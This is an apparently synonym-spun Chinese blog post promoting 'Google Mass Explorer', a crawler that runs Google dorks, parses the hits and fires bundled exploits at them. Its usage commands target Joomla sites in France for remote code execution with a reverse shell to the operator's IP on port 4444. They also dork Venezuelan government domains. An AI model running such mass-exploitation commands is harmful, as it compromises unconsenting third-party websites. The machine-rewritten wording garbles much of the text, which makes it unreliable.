好用的Google缝隙爬虫:Google Mass Explorer

访客5年前黑客工具1271


这是一款根据谷歌搜索引擎的自动化爬虫。
爬虫介绍
爬虫大体机制便是:
先进行一次谷歌搜索,将成果解析为特定格局,然后再提供给exp运用。
我们能够测验运用–help来列出一切参数。
这个项目笔者会持续更新,今后再增加新的exp进行晋级。此外,它会运用google_parsers模块去构建exp解析搜索成果,所以当你开端搜索时,能够挑选“–exploit parser”参数来指定相应exp。
google parsers模块(google_parsers.py)今后还会持续优化,而现在的exp只含有joomla cve,究竟这个项目首要是给我们自己diy运用的。可是,假如你不会弄exp,把运用exp提交给过来也行。
因为笔者平常仍是比较忙,所以没有太多时刻去手动搜索方针。故而,笔者测验运用Selenium框架去造了个爬虫来查找测验方针。至于搜索过程中呈现的Google的验证码,它需求其他库和模块来辅佐处理。在项目里运用Selenium后,我们就能够在谷歌呈现验证码的是时分,自行手动输入验证码,然后爬虫就能够持续爬行了。这大概是笔者能想出的更好的处理验证码防护的办法了。
简略概述下爬虫是怎么作业的:
1. 履行谷歌搜索
2. 从每一页解析成果
3. 测验是否成果中含有缝隙
依靠与需求
这个项目需求python3,运用requirements装置依靠库的办法如下:
$ sudo pip install -r requirements.txt
运转示例:
python3 google_explorer.py --dork="site:*.com inurl:index.php?option=" --browser="chrome" --exploit_parser="joomla_15_12_2019_rce" --revshell="MY_PUBLIC_IP" --port=4444 --google_domain="google.com" --location="França" --last_update="no último mês"
在上面的比方里,笔者是在寻觅法国的joomla RCE方针,运用的是google_domains.txt里边的google域名(比方google.co.uk)来作为搜索引擎,“–last_update”则代表着搜索成果的更新时刻为上个月。
上面比方里的选项适用于任何言语,首要决定于google针对相应的国家给出的语法。
下面再给出一个简略的比方:
python3 google_explorer.py --browser='chrome' --dork='site:gob.ve inurl:index.php' --location="Venezuela"
当然,这些exp也是能够独自运用的:
$ cd xpl_parsers
$ python joomla_cve_2019_8562.py
独自测验exp的办法:
$ cd exploits
$ python exploiter.py --file
 

相关文章

高校SQL注入防治扼要计划

 1、避免SQL注入的动机 近来教育职业的信息安全问题真是一波未平一波又起:连续发作多个高校网站体系被更改,影响恶劣;高校密布被爆SQL注入缝隙,触及80%以上的高校;教育职业成为电信欺诈的重灾区,据...

HTTP 的内容安全策略(CSP)

 本文介绍的是W3C的Content Security Policy,简称CSP。望文生义,这个规范与内容安全有关,首要是用来界说页面能够加载哪些资源,削减XSS的发作。 Chrome扩展现已引进了...

Web版勒索软件CTB-Locker PHP源码现身GitHub

勒索软件CTB-Locker呈现其Web演化版别,可感染网页站点。据剖析,其编码为选用PHP编写,现在源码已被保管至GitHub上。 Web版勒索软件CTB-Locker的初次呈现 就在本年西方情人节...

XSS终结者-CSP理论与实践

 CSP 全称为 Content Security Policy,即内容安全战略。首要以白名单的方法装备可信任的内容来历,在网页中,能够使白名单中的内容正常履行(包括 JS,CSS,Image 等等)...

进犯检测和防备办法之日志剖析

1.  导言 针对linux服务器进犯首要包含溢出提权进犯、端口扫描、后门程序植入等进犯手法,而针对web运用程序的进犯则掩盖愈加广泛,包含SQL注入、XSS、指令履行、文件包含、木马上传等缝隙。本文...

做了这么多年的兄弟,才知道我们不一样!请不要将工控系统中的IT(信息技术)和OT(运营

在工业操控体系(ICS)的安全办理中,安全办理一般被分为3大块:物理设备的安全、IT安全和运营安全(工厂安全和体系完整性)。 现在在工业操控体系(ICS)的安全办理中,信息技能(IT)安全测验变得越来...